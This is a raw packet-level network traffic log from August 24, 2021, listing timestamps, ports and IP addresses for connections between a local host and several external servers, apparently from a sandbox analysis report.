Aug 24, 2021 08:47:01.622827053 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622844934 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622863054 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622876883 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622876883 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.622884989 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.622888088 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.622927904 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.622950077 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.622987986 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623003006 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623023987 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623064995 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623068094 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.623080969 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623198986 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.623224974 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623250961 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623265028 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623289108 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623311996 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623326063 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.623518944 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.623533964 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.647667885 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647726059 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647738934 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647758961 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647778988 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647792101 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647806883 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647829056 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647844076 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647864103 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647883892 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647886038 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.647897005 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647917032 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647933006 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647945881 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647965908 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.647977114 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.647986889 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648008108 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648020029 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648020983 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648041964 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648057938 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648061991 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648066044 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648086071 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648101091 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648121119 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648139954 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648145914 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648154020 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648154974 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648174047 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648194075 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648205996 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648216963 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648231983 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648252010 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648272038 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648272038 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648289919 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648299932 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648317099 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648341894 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648363113 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648375988 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648394108 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648397923 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648407936 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648422003 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648443937 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648458958 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648480892 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648504972 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648528099 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648541927 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648557901 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648577929 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648602009 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648605108 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648613930 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648617029 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648617983 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648622036 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648638010 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648658991 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648679972 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648694038 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648713112 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.648763895 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648772955 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.648776054 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672272921 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672312021 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672337055 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672353029 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672374010 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672399998 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672405958 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672424078 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672441006 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672451019 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672475100 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672506094 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672543049 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672564983 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672583103 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672588110 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672651052 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672674894 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672709942 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672719955 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672734976 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672759056 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672779083 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672780037 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672795057 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672823906 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672838926 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672862053 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672884941 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672888041 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672907114 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672933102 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672955990 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672965050 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.672971010 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.672993898 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673002005 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673017025 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673038006 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673038960 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673054934 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673077106 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673085928 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673103094 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673126936 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673140049 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673149109 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673171997 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673193932 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673193932 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673208952 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673230886 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673235893 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673264980 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673286915 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673300028 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673309088 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673331976 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673356056 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673368931 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673371077 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673393965 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673401117 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673433065 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673458099 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673470020 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673480988 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673502922 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673528910 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673544884 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673567057 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673574924 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673589945 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673612118 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673635006 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673641920 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673657894 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673671961 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.673680067 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673697948 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.673742056 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.681552887 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.697766066 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697802067 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697851896 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697875023 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697897911 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697918892 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697932959 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697948933 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697967052 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.697987080 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:01.698035002 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.698059082 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.698062897 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.699013948 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:01.724013090 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745397091 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745434046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745464087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745476961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745496035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745517015 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745536089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745553970 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745570898 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745568991 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745599985 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745618105 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745628119 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745635986 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745652914 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745662928 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745673895 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745690107 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745695114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745713949 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745732069 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745738983 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745748997 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745763063 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745767117 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745785952 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745801926 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745805025 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745825052 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745843887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745846987 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745862961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745867968 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745881081 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745893955 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745898962 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745915890 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745932102 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.745933056 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.745976925 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.747848988 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747879028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747898102 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747915030 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747930050 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.747931957 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747951031 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747963905 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747967958 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.747982025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.747998953 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748012066 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748017073 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748035908 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748044968 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748054981 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748065948 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748071909 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748089075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748106956 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748111010 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748125076 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748142004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748158932 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748162985 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748174906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748191118 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748203039 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748219013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748219013 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748234987 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748246908 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748246908 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748265982 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748275995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748285055 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748301983 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748306036 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748318911 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748334885 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748347998 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748351097 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748364925 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748380899 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748397112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748398066 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748414993 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748428106 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748430967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:01.748447895 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:01.748521090 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:03.645734072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:03.645881891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:03.669226885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:03.696919918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:03.765971899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:03.849823952 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:03.849889040 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:03.872112989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:03.895261049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:04.078421116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:04.100789070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:04.100922108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:04.124596119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:04.149142027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:04.269860983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:06.080440998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:06.080491066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:06.103804111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:06.127907991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:06.266221046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:06.678759098 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:06.678936958 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:07.220843077 CEST	49720	2080	192.168.2.7	185.49.70.90
Aug 24, 2021 08:47:07.251904964 CEST	2080	49720	185.49.70.90	192.168.2.7
Aug 24, 2021 08:47:07.540319920 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:47:07.594527006 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:47:07.595204115 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:47:07.595371008 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:47:07.595510006 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:47:07.813777924 CEST	49718	14462	192.168.2.7	185.230.143.48
Aug 24, 2021 08:47:07.906284094 CEST	14462	49718	185.230.143.48	192.168.2.7
Aug 24, 2021 08:47:16.127842903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:16.127932072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:16.127970934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:16.150331974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:16.264887094 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:16.287003994 CEST	80	49722	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:16.287204981 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:16.293051958 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:16.293076992 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:16.316024065 CEST	80	49722	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:16.316051960 CEST	80	49722	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:16.339485884 CEST	80	49722	212.224.105.79	192.168.2.7
